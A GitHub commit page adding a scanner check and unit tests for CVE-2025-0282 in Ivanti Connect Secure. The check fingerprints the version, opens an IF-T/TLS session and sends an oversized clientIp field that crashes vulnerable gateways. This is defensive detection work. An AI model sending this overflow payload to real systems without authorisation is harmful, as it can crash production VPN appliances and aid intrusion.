Skip to content

Commit

Permalink
Add Detection for CVE-2025-0282
Browse files Browse the repository at this point in the history
  • Loading branch information
nmasdoufi-ol committed Jan 17, 2025
1 parent b2095f2 commit 7f253a2
Show file tree
Hide file tree
Showing 2 changed files with 311 additions and 0 deletions.
179 changes: 179 additions & 0 deletions agent/exploits/cve_2025_0282.py
Original file line number Diff line number Diff line change
@@ -0,0 +1,179 @@
"""Agent Asteroid implementation for CVE-2025-0282"""

import datetime
import logging
import re
import socket
import ssl
import struct

from requests import exceptions as requests_exceptions

from agent import definitions
from agent import exploits_registry
from agent.exploits import webexploit

VULNERABILITY_TITLE = "Ivanti Connect Secure Buffer Overflow"
VULNERABILITY_REFERENCE = "CVE-2025-0282"
VULNERABILITY_DESCRIPTION = """
A stack-based buffer overflow vulnerability in Ivanti Connect Secure before version 22.7R2.5,
Ivanti Policy Secure before version 22.7R1.2, and Ivanti Neurons for ZTA gateways before
version 22.7R2.3 allows a remote unauthenticated attacker to achieve remote code execution.
"""
RISK_RATING = "CRITICAL"
DEFAULT_TIMEOUT = datetime.timedelta(seconds=10)

VERSION_PATTERN = re.compile(r'<PARAM NAME="ProductVersion"\s+VALUE="([0-9.]+)')
VULNERABLE_VERSIONS = [
"22.7.1.907", # IPS 22.7.1R1
"22.7.1.1321", # IPS 22.7.1R1.1
"22.7.1.1485", # IPS 22.7.1R1.2
]
CONNECTION_RESET = "connection reset by peer"
SWITCHING_PROTOCOL = b"HTTP/1.1 101 Switching Protocols"
ACCEPTED_SCHEME = "https"
ENDPOINT = "/dana-na/auth/url_admin/welcome.cgi?type=inter"


def _rcv_ift(sock: ssl.SSLSocket) -> tuple[int, int, bytes]:
"""Receive IF-T message."""
try:
header = sock.read(16)
if not header or len(header) != 16:
raise socket.error("Failed to read IF-T header")

Check warning on line 43 in agent/exploits/cve_2025_0282.py

View check run for this annotation

Codecov / codecov/patch

agent/exploits/cve_2025_0282.py#L43

Added line #L43 was not covered by tests
vendor, ptype, length, seqno = struct.unpack(">IIII", header)
data = sock.read(length - 16)
if len(data) != length - 16:
raise socket.error("Incomplete IF-T data received")
return vendor, ptype, data
except (socket.error, ssl.SSLError) as e:
logging.error("Error receiving IF-T message: %s", e)
raise


def _send_ift(
sock: ssl.SSLSocket, vendor: int, ptype: int, seqno: int, data: bytes
) -> None:
"""Send IF-T message."""
hdr = struct.pack(">IIII", vendor, ptype, len(data) + 16, seqno)
sock.send(hdr + data)


def _negotiate_ifttls(host: str, scheme: str, port: int) -> ssl.SSLSocket:
"""Negotiate IF-T/TLS connection."""
try:
ctx = ssl.create_default_context()
s = ctx.wrap_socket(socket.create_connection((host, port), timeout=3))
except socket.error as e:
logging.error(
"Socket connection failed for %s://%s:%d: %s", scheme, host, port, e
)
raise ConnectionError(
f"{scheme}://{host}:{port}: Failed to create TLS socket connection"
)
req = b"GET / HTTP/1.1\r\n"
req += f"Host: {host}\r\n".encode()
req += b"User-Agent: BishopFox\r\n"
req += b"Content-Type: EAP\r\n"
req += b"Upgrade: IF-T/TLS 1.0\r\n"
req += b"Content-Length: 0\r\n"
req += b"\r\n"
s.send(req)
resp = s.recv(1024)
if SWITCHING_PROTOCOL not in resp:
raise ConnectionError(

Check warning on line 84 in agent/exploits/cve_2025_0282.py

View check run for this annotation

Codecov / codecov/patch

agent/exploits/cve_2025_0282.py#L84

Added line #L84 was not covered by tests
f"{scheme}://{host}:{port}: Server does not support IF-T/TLS"
)
return s


@exploits_registry.register
class IvantiConnectSecureExploit(webexploit.WebExploit):
"""
CVE-2025-0282: Ivanti Connect Secure Buffer Overflow
"""

metadata = definitions.VulnerabilityMetadata(
title=VULNERABILITY_TITLE,
description=VULNERABILITY_DESCRIPTION,
reference=VULNERABILITY_REFERENCE,
risk_rating=RISK_RATING,
)

def _check_version(self, target: definitions.Target) -> bool:
"""Check if the target version is vulnerable."""
try:
resp = self.session.get(
f"{target.origin}{ENDPOINT}",
verify=False,
timeout=DEFAULT_TIMEOUT.seconds,
)
resp.raise_for_status()

match = VERSION_PATTERN.search(resp.text)
if match is not None:
version = match.group(1)
# Check if version is below any of the patched versions
if version.startswith("22.7.2.") or version in VULNERABLE_VERSIONS:
return True
logging.info("Version not vulnerable")
return False

Check warning on line 120 in agent/exploits/cve_2025_0282.py

View check run for this annotation

Codecov / codecov/patch

agent/exploits/cve_2025_0282.py#L119-L120

Added lines #L119 - L120 were not covered by tests
except requests_exceptions.RequestException:
logging.error("Version check failed for %s", target.origin)
return False

def accept(self, target: definitions.Target) -> bool:
"""Check if target is an Ivanti Connect Secure instance."""
return target.scheme.lower() == ACCEPTED_SCHEME and self._check_version(target)

def check(self, target: definitions.Target) -> list[definitions.Vulnerability]:
"""Check if target is vulnerable to buffer overflow."""
vulnerabilities: list[definitions.Vulnerability] = []
s = None

try:
s = _negotiate_ifttls(target.host, target.scheme, target.port or 443)

# Send client version request
_send_ift(s, 0x5597, 1, 0, b"\x00\x01\x02\x02")

# Receive version response
vendor, ptype, data = _rcv_ift(s)

# Receive auth challenge
vendor, ptype, data = _rcv_ift(s)

# Send auth response
payload = b"clientHostname=BishopFox"
payload += b" clientIp=" + b"A" * 0x40
payload += b"\n\0"
_send_ift(s, 0xA4C, 0x88, 1, payload)
_send_ift(s, 0xA4C, 0x88, 2, b"anonymous\n\0")

# Check for vulnerability
try:
vendor, ptype, data = _rcv_ift(s)
if vendor == 0xA4C and ptype == 0x93:
print(f"{target.scheme}://{target.host}:{target.port}: Patched")

Check warning on line 157 in agent/exploits/cve_2025_0282.py

View check run for this annotation

Codecov / codecov/patch

agent/exploits/cve_2025_0282.py#L156-L157

Added lines #L156 - L157 were not covered by tests
except socket.timeout:
print(

Check warning on line 159 in agent/exploits/cve_2025_0282.py

View check run for this annotation

Codecov / codecov/patch

agent/exploits/cve_2025_0282.py#L159

Added line #L159 was not covered by tests
f"{target.scheme}://{target.host}:{target.port}: Unexpected response: vendor={hex(vendor)}, type={hex(ptype)}, data={data.hex()}"
)
# Timeout indicates probable crash from buffer overflow
vulnerabilities.append(self._create_vulnerability(target))

Check warning on line 163 in agent/exploits/cve_2025_0282.py

View check run for this annotation

Codecov / codecov/patch

agent/exploits/cve_2025_0282.py#L163

Added line #L163 was not covered by tests
except (socket.error, ssl.SSLError) as e:
if CONNECTION_RESET in str(e).lower():
# Connection reset also indicates probable crash
vulnerabilities.append(self._create_vulnerability(target))

except (socket.error, ssl.SSLError) as e:
logging.error("Vulnerability check failed: %s", e)
finally:
try:
if s is not None:
s.close()
except socket.error as e:
logging.error("Socket error while closing socket: %s", e)
pass

Check warning on line 177 in agent/exploits/cve_2025_0282.py

View check run for this annotation

Codecov / codecov/patch

agent/exploits/cve_2025_0282.py#L175-L177

Added lines #L175 - L177 were not covered by tests

return vulnerabilities
132 changes: 132 additions & 0 deletions tests/exploits/cve_2025_0282_test.py
Original file line number Diff line number Diff line change
@@ -0,0 +1,132 @@
"""Unit tests for Agent Asteroid: CVE-2025-0282"""

import socket
import ssl
import struct
from unittest import mock

from requests import exceptions as requests_exceptions

from agent import definitions
from agent.exploits import cve_2025_0282


def create_mock_socket(is_vulnerable: bool = True) -> mock.Mock:
"""Create a mock socket with predefined responses."""
mock_socket = mock.Mock(spec=ssl.SSLSocket)

# Mock initial HTTP upgrade response
mock_socket.recv.return_value = b"HTTP/1.1 101 Switching Protocols\r\n"

# Mock the sequence of read responses
responses = [
# Version response header + data
struct.pack(">IIII", 0x5597, 1, 20, 0), # 16 byte header + 4 byte data
b"\x00\x01\x02\x02",
# Auth challenge header + data
struct.pack(">IIII", 0xA4C, 0x87, 48, 1), # 16 byte header + 32 byte data
b"A" * 32,
]

if is_vulnerable is True:
# Simulate connection reset after auth challenge
mock_socket.read.side_effect = responses + [
socket.error("Connection reset by peer")
]
else:
# Simulate normal response
responses.extend(
[
struct.pack(
">IIII", 0xA4C, 0x93, 20, 2
), # 16 byte header + 4 byte data
b"Patched",
]
)
mock_socket.read.side_effect = responses

return mock_socket


def testAccept_whenHttpsAndVulnerableVersion_shouldReturnTrue() -> None:
"""Test accept method with valid conditions."""
exploit = cve_2025_0282.IvantiConnectSecureExploit()
target = definitions.Target("https", "localhost", 443)

mock_response = mock.Mock()
mock_response.text = '<PARAM NAME="ProductVersion" VALUE="22.7.2.4">'
mock_response.raise_for_status = mock.Mock()

mock_session = mock.Mock()
mock_session.get.return_value = mock_response

with mock.patch.object(exploit, "session", mock_session):
assert exploit.accept(target) is True

target = definitions.Target("http", "localhost", 80)
assert exploit.accept(target) is False


def testCheck_whenTargetIsVulnerable_shouldReportVulnerability() -> None:
"""Test check method with vulnerable target."""
exploit = cve_2025_0282.IvantiConnectSecureExploit()
target = definitions.Target("https", "localhost", 443)

mock_version_response = mock.Mock()
mock_version_response.text = '<PARAM NAME="ProductVersion" VALUE="22.7.2.4">'
mock_version_response.raise_for_status = mock.Mock()
mock_socket = create_mock_socket(is_vulnerable=True)

with (
mock.patch.object(exploit, "session") as mock_session,
mock.patch("ssl.create_default_context") as mock_ssl_ctx,
mock.patch("socket.create_connection") as mock_create_conn,
):
mock_session.get.return_value = mock_version_response
mock_ssl_ctx.return_value.wrap_socket.return_value = mock_socket
mock_create_conn.return_value = mock_socket

vulnerabilities = exploit.check(target)
assert len(vulnerabilities) == 1
assert vulnerabilities[0].entry.title == cve_2025_0282.VULNERABILITY_TITLE
assert vulnerabilities[0].entry.risk_rating == cve_2025_0282.RISK_RATING


def testCheck_whenTargetIsNotVulnerable_shouldNotReportVulnerability() -> None:
"""Test check method with non-vulnerable target."""
exploit = cve_2025_0282.IvantiConnectSecureExploit()
target = definitions.Target("https", "localhost", 443)

mock_version_response = mock.Mock()
mock_version_response.text = '<PARAM NAME="ProductVersion" VALUE="22.7R2.6">'
mock_version_response.raise_for_status = mock.Mock()
mock_socket = create_mock_socket(is_vulnerable=False)

with (
mock.patch.object(exploit, "session") as mock_session,
mock.patch("ssl.create_default_context") as mock_ssl_ctx,
mock.patch("socket.create_connection") as mock_create_conn,
):
mock_session.get.return_value = mock_version_response
mock_ssl_ctx.return_value.wrap_socket.return_value = mock_socket
mock_create_conn.return_value = mock_socket

vulnerabilities = exploit.check(target)
assert len(vulnerabilities) == 0


def testCheck_whenVersionCheckFails_shouldNotReportVulnerability() -> None:
"""Test check method when version check fails."""
exploit = cve_2025_0282.IvantiConnectSecureExploit()
target = definitions.Target("https", "localhost", 443)

with (
mock.patch.object(exploit, "session") as mock_session,
mock.patch("ssl.create_default_context"),
mock.patch("socket.create_connection") as mock_create_conn,
):
mock_session.get.side_effect = requests_exceptions.RequestException()
mock_create_conn.side_effect = ConnectionError("Test connection error")

vulnerabilities = exploit.check(target)
assert len(vulnerabilities) == 0

0 comments on commit 7f253a2

Please sign in to comment.